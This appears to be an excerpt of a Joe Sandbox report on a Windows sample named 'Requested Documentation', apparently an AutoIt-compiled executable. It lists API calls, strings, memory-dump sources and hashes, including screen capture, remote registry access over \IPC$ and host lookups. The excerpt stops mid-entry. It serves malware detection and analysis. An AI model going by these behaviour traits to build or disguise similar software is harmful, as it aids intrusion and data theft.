                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                              • String ID: 0
                                                                              • API String ID: 1296962147-4108050209
                                                                              • Opcode ID: dbeb891333bdeb09efa2b63569b541420d09804effc8cb54b9fe5ff0852edf3b
                                                                              • Instruction ID: 8bfc67c197d9f61f3d1340b824841ffc7c13687f4ff076748a9a8eab264621f8
                                                                              • Opcode Fuzzy Hash: dbeb891333bdeb09efa2b63569b541420d09804effc8cb54b9fe5ff0852edf3b
                                                                              • Instruction Fuzzy Hash: 408181706083099FD720DF64E894ABBBBE4FB88724F004A2DF995972D1D731D905CB92
                                                                              APIs
                                                                              • GetDC.USER32(00000000), ref: 009F738F
                                                                              • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 009F739B
                                                                              • CreateCompatibleDC.GDI32(?), ref: 009F73A7
                                                                              • SelectObject.GDI32(00000000,?), ref: 009F73B4
                                                                              • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 009F7408
                                                                              • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 009F7444
                                                                              • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 009F7468
                                                                              • SelectObject.GDI32(00000006,?), ref: 009F7470
                                                                              • DeleteObject.GDI32(?), ref: 009F7479
                                                                              • DeleteDC.GDI32(00000006), ref: 009F7480
                                                                              • ReleaseDC.USER32(00000000,?), ref: 009F748B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                              • String ID: (
                                                                              • API String ID: 2598888154-3887548279
                                                                              • Opcode ID: 975ffdef6b1e60d9c4f0b351f5e19c48c640f2810a240779c3fa3a6896d6acbe
                                                                              • Instruction ID: 42951b727f9abf8c8bb4f6c56636c436e6a3f43d5402e364d0a13080a18d0176
                                                                              • Opcode Fuzzy Hash: 975ffdef6b1e60d9c4f0b351f5e19c48c640f2810a240779c3fa3a6896d6acbe
                                                                              • Instruction Fuzzy Hash: 01515A75904309EFCB24CFA8DC84EAEBBB9EF48310F14842DFA59A7211D771A941CB50
                                                                              APIs
                                                                                • Part of subcall function 009A0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00986B0C,?,00008000), ref: 009A0973
                                                                                • Part of subcall function 00984750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00984743,?,?,009837AE,?), ref: 00984770
                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00986BAD
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00986CFA
                                                                                • Part of subcall function 0098586D: _wcscpy.LIBCMT ref: 009858A5
                                                                                • Part of subcall function 009A363D: _iswctype.LIBCMT ref: 009A3645
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                              • API String ID: 537147316-1018226102
                                                                              • Opcode ID: c319f1743a2aa45444eab6d69c55ae53cf9eaca30a7f639460587668406659c1
                                                                              • Instruction ID: 83a77b2a6ee2501d33805fe028fc77aecaf7e48fc6e0f2adbcf56710fd796709
                                                                              • Opcode Fuzzy Hash: c319f1743a2aa45444eab6d69c55ae53cf9eaca30a7f639460587668406659c1
                                                                              • Instruction Fuzzy Hash: 1D0289311083419FCB24EF24C991AAFBBE9AFD9314F14481DF49A973A2DB31D949CB52
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 009E2D50
                                                                              • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 009E2DDD
                                                                              • GetMenuItemCount.USER32(00A45890), ref: 009E2E66
                                                                              • DeleteMenu.USER32(00A45890,00000005,00000000,000000F5,?,?), ref: 009E2EF6
                                                                              • DeleteMenu.USER32(00A45890,00000004,00000000), ref: 009E2EFE
                                                                              • DeleteMenu.USER32(00A45890,00000006,00000000), ref: 009E2F06
                                                                              • DeleteMenu.USER32(00A45890,00000003,00000000), ref: 009E2F0E
                                                                              • GetMenuItemCount.USER32(00A45890), ref: 009E2F16
                                                                              • SetMenuItemInfoW.USER32(00A45890,00000004,00000000,00000030), ref: 009E2F4C
                                                                              • GetCursorPos.USER32(?), ref: 009E2F56
                                                                              • SetForegroundWindow.USER32(00000000), ref: 009E2F5F
                                                                              • TrackPopupMenuEx.USER32(00A45890,00000000,?,00000000,00000000,00000000), ref: 009E2F72
                                                                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 009E2F7E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                              • String ID:
                                                                              • API String ID: 3993528054-0
                                                                              • Opcode ID: 55d4af00c7c8661fefc4dd657b5b19eda295d02bd4488ba4273567bbcfa1ccda
                                                                              • Instruction ID: 7deb9dbd2fbab1fe1eae868896f097c5a39692153c5fe389e764d016de0785f7
                                                                              • Opcode Fuzzy Hash: 55d4af00c7c8661fefc4dd657b5b19eda295d02bd4488ba4273567bbcfa1ccda
                                                                              • Instruction Fuzzy Hash: D271F571600299BFEB268F56DC45FAABF6CFF44364F10021AF625AA1E1C7B16C50DB90
                                                                              APIs
                                                                                • Part of subcall function 00987BCC: _memmove.LIBCMT ref: 00987C06
                                                                              • _memset.LIBCMT ref: 009D786B
                                                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 009D78A0
                                                                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 009D78BC
                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 009D78D8
                                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 009D7902
                                                                              • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 009D792A
                                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 009D7935
                                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 009D793A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                              • API String ID: 1411258926-22481851
                                                                              • Opcode ID: 3407a38627bb9e269ff212ac397d1e0abbd1d7f1428a4aa157fd8c703fd702bc
                                                                              • Instruction ID: 103bba1cd192d88c5383eb42b671558e6ebda4bd96473d5cfe16870d7ab6a083
                                                                              • Opcode Fuzzy Hash: 3407a38627bb9e269ff212ac397d1e0abbd1d7f1428a4aa157fd8c703fd702bc
                                                                              • Instruction Fuzzy Hash: C241D67281422DABCB21EFE4DC95EEDF778BF54310F44446AF905A3261EA319D05CB90
                                                                              APIs
                                                                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,009FFDAD,?,?), ref: 00A00E31
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharUpper
                                                                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                              • API String ID: 3964851224-909552448
                                                                              • Opcode ID: 9b45b1d689965707f2bff4bb7e114be71cbbfc85eebc63d09ff18d9d59f67d32
                                                                              • Instruction ID: 3541bed1d63e11aac9c274eb724bbcf80e1f761f0fcf4b70f5a34855e9997dc2
                                                                              • Opcode Fuzzy Hash: 9b45b1d689965707f2bff4bb7e114be71cbbfc85eebc63d09ff18d9d59f67d32
                                                                              • Instruction Fuzzy Hash: 83416A3110025A8BCF20EF50E895BEF3B60AF92354F580424FC555B2D2DB719D1ADBA0
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,009BE2A0,00000010,?,Bad directive syntax error,00A0F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 009DF7C2
                                                                              • LoadStringW.USER32(00000000,?,009BE2A0,00000010), ref: 009DF7C9
                                                                                • Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22
                                                                              • _wprintf.LIBCMT ref: 009DF7FC
                                                                              • __swprintf.LIBCMT ref: 009DF81E
                                                                              • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 009DF88D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                              • API String ID: 1506413516-4153970271
                                                                              • Opcode ID: 21d1fe2e6d51fa7e1b61bb4bc362bf64674b4e102ebdd4a34f5682bff347c1af
                                                                              • Instruction ID: b82163bd8bbe96f860cdd332f566204e612cf2476132c10d02a445936c98d08a
                                                                              • Opcode Fuzzy Hash: 21d1fe2e6d51fa7e1b61bb4bc362bf64674b4e102ebdd4a34f5682bff347c1af
                                                                              • Instruction Fuzzy Hash: 9B215C3294021EBBCF11EFD0CC1AFEEB739BF18300F044866F516662A1EA769618DB51
                                                                              APIs
                                                                                • Part of subcall function 00987BCC: _memmove.LIBCMT ref: 00987C06
                                                                                • Part of subcall function 00987924: _memmove.LIBCMT ref: 009879AD
                                                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 009E5330
                                                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 009E5346
                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009E5357
                                                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 009E5369
                                                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 009E537A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: SendString$_memmove
                                                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                              • API String ID: 2279737902-1007645807
                                                                              • Opcode ID: 074a3fce9f468926da2b7bf79cc98d34f0709a2bc73b67bd77e4e5d27367d3f3
                                                                              • Instruction ID: 59745aa0c7c58dc7c16995a7bfec0258378fe186532149f680f27d0390d59a92
                                                                              • Opcode Fuzzy Hash: 074a3fce9f468926da2b7bf79cc98d34f0709a2bc73b67bd77e4e5d27367d3f3
                                                                              • Instruction Fuzzy Hash: C011C83095025979D720B7A2CC4AEFFBB7CFBD1B44F100819F411A31E1EEA04D05C6A0
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                              • String ID: 0.0.0.0
                                                                              • API String ID: 208665112-3771769585
                                                                              • Opcode ID: c12905a0ff50a1211b3c89b00844fb890f5f1f3ffc4a6dd35b173b97cabb6825
                                                                              • Instruction ID: 2c19a71637110bd3f6e9a4134bf555801bcac55e0e6e1d252a217fac09bd73f2
                                                                              • Opcode Fuzzy Hash: c12905a0ff50a1211b3c89b00844fb890f5f1f3ffc4a6dd35b173b97cabb6825
                                                                              • Instruction Fuzzy Hash: FD11E731500118AFCF21AB759C4AFDA77BCEF86711F0441B6F445A6091FF768E8286D1
                                                                              APIs
                                                                              • timeGetTime.WINMM ref: 009E4F7A
                                                                                • Part of subcall function 009A049F: timeGetTime.WINMM(?,75C0B400,00990E7B), ref: 009A04A3
                                                                              • Sleep.KERNEL32(0000000A), ref: 009E4FA6
                                                                              • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 009E4FCA
                                                                              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 009E4FEC
                                                                              • SetActiveWindow.USER32 ref: 009E500B
                                                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 009E5019
                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 009E5038
                                                                              • Sleep.KERNEL32(000000FA), ref: 009E5043
                                                                              • IsWindow.USER32 ref: 009E504F
                                                                              • EndDialog.USER32(00000000), ref: 009E5060
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                              • String ID: BUTTON
                                                                              • API String ID: 1194449130-3405671355
                                                                              • Opcode ID: b050fabe31545cd8caa4e0695869f805f7dcb828bfd12223bf8971505f9d335c
                                                                              • Instruction ID: c7bdc30d1cb0c92cd3e7b2381a84f11402b814551962d845fe6c5369a6c6ac3a
                                                                              • Opcode Fuzzy Hash: b050fabe31545cd8caa4e0695869f805f7dcb828bfd12223bf8971505f9d335c
                                                                              • Instruction Fuzzy Hash: C721C278600748AFE722DFF1EC89B663B69EB8674AF041424F106925B1CBA24D038663
                                                                              APIs
                                                                                • Part of subcall function 00989837: __itow.LIBCMT ref: 00989862
                                                                                • Part of subcall function 00989837: __swprintf.LIBCMT ref: 009898AC
                                                                              • CoInitialize.OLE32(00000000), ref: 009ED5EA
                                                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 009ED67D
                                                                              • SHGetDesktopFolder.SHELL32(?), ref: 009ED691
                                                                              • CoCreateInstance.OLE32(00A12D7C,00000000,00000001,00A38C1C,?), ref: 009ED6DD
                                                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 009ED74C
                                                                              • CoTaskMemFree.OLE32(?,?), ref: 009ED7A4
                                                                              • _memset.LIBCMT ref: 009ED7E1
                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 009ED81D
                                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 009ED840
                                                                              • CoTaskMemFree.OLE32(00000000), ref: 009ED847
                                                                              • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 009ED87E
                                                                              • CoUninitialize.OLE32(00000001,00000000), ref: 009ED880
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                              • String ID:
                                                                              • API String ID: 1246142700-0
                                                                              • Opcode ID: c495d1dcc595f8b0e1f75c167d44003bb98219476b736edda91635698553a78e
                                                                              • Instruction ID: 2ffaacc0c998ab71ef0014e932e1aa547069dcd163f84e7f3c2ec0c9520311b2
                                                                              • Opcode Fuzzy Hash: c495d1dcc595f8b0e1f75c167d44003bb98219476b736edda91635698553a78e
                                                                              • Instruction Fuzzy Hash: 0CB10B75A00109AFDB14DFA5C884EAEBBB9FF88304F148469F809EB261DB31ED45CB50
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,00000001), ref: 009DC283
                                                                              • GetWindowRect.USER32(00000000,?), ref: 009DC295
                                                                              • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 009DC2F3
                                                                              • GetDlgItem.USER32(?,00000002), ref: 009DC2FE
                                                                              • GetWindowRect.USER32(00000000,?), ref: 009DC310
                                                                              • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 009DC364
                                                                              • GetDlgItem.USER32(?,000003E9), ref: 009DC372
                                                                              • GetWindowRect.USER32(00000000,?), ref: 009DC383
                                                                              • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 009DC3C6
                                                                              • GetDlgItem.USER32(?,000003EA), ref: 009DC3D4
                                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 009DC3F1
                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 009DC3FE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                                              • String ID:
                                                                              • API String ID: 3096461208-0
                                                                              • Opcode ID: db2f90f1b5677c4d26a442d292671b0708f4a061d8e65b4bc9e4664016273f98
                                                                              • Instruction ID: 212ae479066cd1760d7adae21dc299eb0a2c692ff8fc89c300661816bcb549df
                                                                              • Opcode Fuzzy Hash: db2f90f1b5677c4d26a442d292671b0708f4a061d8e65b4bc9e4664016273f98
                                                                              • Instruction Fuzzy Hash: 975121B1B40209AFDF18CFA9DD85A6DBBBAEB88711F148129F515E7290D7719D01CB10
                                                                              APIs
                                                                                • Part of subcall function 00981B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00982036,?,00000000,?,?,?,?,009816CB,00000000,?), ref: 00981B9A
                                                                              • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 009820D3
                                                                              • KillTimer.USER32(-00000001,?,?,?,?,009816CB,00000000,?,?,00981AE2,?,?), ref: 0098216E
                                                                              • DestroyAcceleratorTable.USER32(00000000), ref: 009BBCA6
                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,009816CB,00000000,?,?,00981AE2,?,?), ref: 009BBCD7
                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,009816CB,00000000,?,?,00981AE2,?,?), ref: 009BBCEE
                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,009816CB,00000000,?,?,00981AE2,?,?), ref: 009BBD0A
                                                                              • DeleteObject.GDI32(00000000), ref: 009BBD1C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                              • String ID:
                                                                              • API String ID: 641708696-0
                                                                              • Opcode ID: 7d7fffcd7c6f769ec473c6a978373251a785429c078496fae1893e98b9ad6ae8
                                                                              • Instruction ID: 8e3bd4816a47a4b697650b696cae4503c40c7e3ca648a55e9be8932cbb72e9ab
                                                                              • Opcode Fuzzy Hash: 7d7fffcd7c6f769ec473c6a978373251a785429c078496fae1893e98b9ad6ae8
                                                                              • Instruction Fuzzy Hash: 0F61B339904A04DFC735EF64D948B2977F5FF81312F104929E5425BAB1C775A882DF90
                                                                              APIs
                                                                                • Part of subcall function 009825DB: GetWindowLongW.USER32(?,000000EB), ref: 009825EC
                                                                              • GetSysColor.USER32(0000000F), ref: 009821D3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
